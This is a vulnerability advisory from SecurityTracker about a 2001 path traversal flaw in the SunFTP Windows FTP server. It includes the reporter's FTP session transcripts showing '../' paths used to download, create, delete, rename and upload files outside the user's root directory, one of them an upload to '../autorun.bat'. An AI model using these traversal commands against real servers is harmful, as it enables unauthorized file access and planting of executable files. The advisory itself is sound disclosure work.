SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (File Transfer/Sharing)  >   SunFTP Vendors:   Allenheim, Rasmus J.P.
SunFTP (A Windows-Based FTP Server) Allows Read and Write Access to Files and Directories Outside of the Server's Root Directory
SecurityTracker Alert ID:  1000986
SecurityTracker URL:  http://securitytracker.com/id/1000986
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Mar 5 2001
Impact:   Disclosure of system information, Disclosure of user information, Modification of system information, Modification of user information
Exploit Included:  Yes  
Version(s): Build 9(1)
Description:   The SunFTP server project (an FTP server for Microsoft Windows) contains a vulnerability that allows unauthorized remote usres to access directories outside of the FTP server directory and issue FTP commands as well.

It is possible to break out of the root directory by using relative paths. In addition, it is possible to execute FTP commands such as mkdir, rmdir, rename, and put. These commands can be invoked for files and directories outside of the server's root directory.

Impact:   An authorized user with remote or local access to the FTP server can obtain files outside of the server's root directory. If the user has permission to PUT files on the FTP server, the user can place arbitrary files on the server.
Solution:   No solution was available at the time of this entry.
Cause:   Access control error, Input validation error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Sunftp build9(1) - ftp server Vulnerability


It is possible to break out of the root directory by 
using relative paths

e:\crap was used as homedir. of user test.

#the get command#


getting files from outside of the root dir.

220 chris FTP Server (SunFTP b9) ready on port 21...
Benutzer (10.17.3.44:(none)): test
331 Password required for test.
Kennwort:
230 User test logged in.
ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw-   1 ftp      ftp            0 Feb 28 13:46 .
drw-rw-rw-   1 ftp      ftp            0 Feb 28 13:46 ..
-rw-rw-rw-   1 ftp      ftp            0 Mar 02 11:21 test.txt
226 File sent ok
FTP: 179 Bytes empfangen in 0,00Sekunden 
179000,00KB/s
ftp> cd ..
501 CWD failed. No permission
ftp> get ../sunftptest.txt
200 Port command successful.
150 Opening data connection for ../sunftptest.txt.
226 File sent ok
FTP: 1443 Bytes empfangen in 0,00Sekunden 
1443000,00KB/s


#the mkdir command#


without priv. to create directories:

ftp> mkdir test
550 '/test': can't create directory.
ftp> mkdir ../test
257 '/../test': directory created.

hell!it's getting worse...


#the rmdir command#


without any priv. to remove anything

ftp> rmdir ../test
250 '/../test': directory removed.

this only works with empty directories


#the rename command#

it is possible to rename files outside of the root 
directory without 
permissions.And it is also possible to move files with 
the rename command,
when the filename is known.

ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw-   1 ftp      ftp            0 Feb 28 13:46 .
drw-rw-rw-   1 ftp      ftp            0 Feb 28 13:46 ..
-rw-rw-rw-   1 ftp      ftp            0 Mar 02 11:21 
grmbl.txt
drw-rw-rw-   1 ftp      ftp            0 Mar 02 12:17 test
226 File sent ok
FTP: 240 Bytes empfangen in 0,00Sekunden 
240000,00KB/s
ftp> cd ..
501 CWD failed. No permission
ftp> rename ../sunftptest.txt movedtohomedir.txt
350 File exists, ready for destination name.
250 File '/../sunftptest.txt' renamed 
to '/movedtohomedir.txt'.
ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw-   1 ftp      ftp            0 Feb 28 13:46 .
drw-rw-rw-   1 ftp      ftp            0 Feb 28 13:46 ..
-rw-rw-rw-   1 ftp      ftp            0 Mar 02 11:21 
grmbl.txt
drw-rw-rw-   1 ftp      ftp            0 Mar 02 12:17 test
-rw-rw-rw-   1 ftp      ftp            6 Mar 02 12:33 
movedtohomedir.txt
226 File sent ok
FTP: 314 Bytes empfangen in 0,00Sekunden 
314000,00KB/s


#the put command#

If you have permission to upload files, you can put 
these files outside of 
the homedir.

ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw-   1 ftp      ftp            0 Feb 28 13:46 .
drw-rw-rw-   1 ftp      ftp            0 Feb 28 13:46 ..
-rw-rw-rw-   1 ftp      ftp            0 Mar 02 11:21 
grmbl.txt
drw-rw-rw-   1 ftp      ftp            0 Mar 02 12:17 test
-rw-rw-rw-   1 ftp      ftp            6 Mar 02 12:33 
movedtohomedir.txt
226 File sent ok
FTP: 314 Bytes empfangen in 0,00Sekunden 
314000,00KB/s
ftp> put
Lokale Datei c:\test.txt
Remotedatei test.txt
200 Port command successful.
150 Opening data connection for test.txt.
226 File received ok
ftp> put
Lokale Datei c:\test.txt
Remotedatei ../autorun.bat
200 Port command successful.
150 Opening data connection for ../autorun.bat.
226 File received ok



Solution

no quick bugfix. Use with care 

I tried to contact the authors, but their webpage 
seems to be down.

se00020@lion.cc or
se00020@fhs-hagenberg.ac.at


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC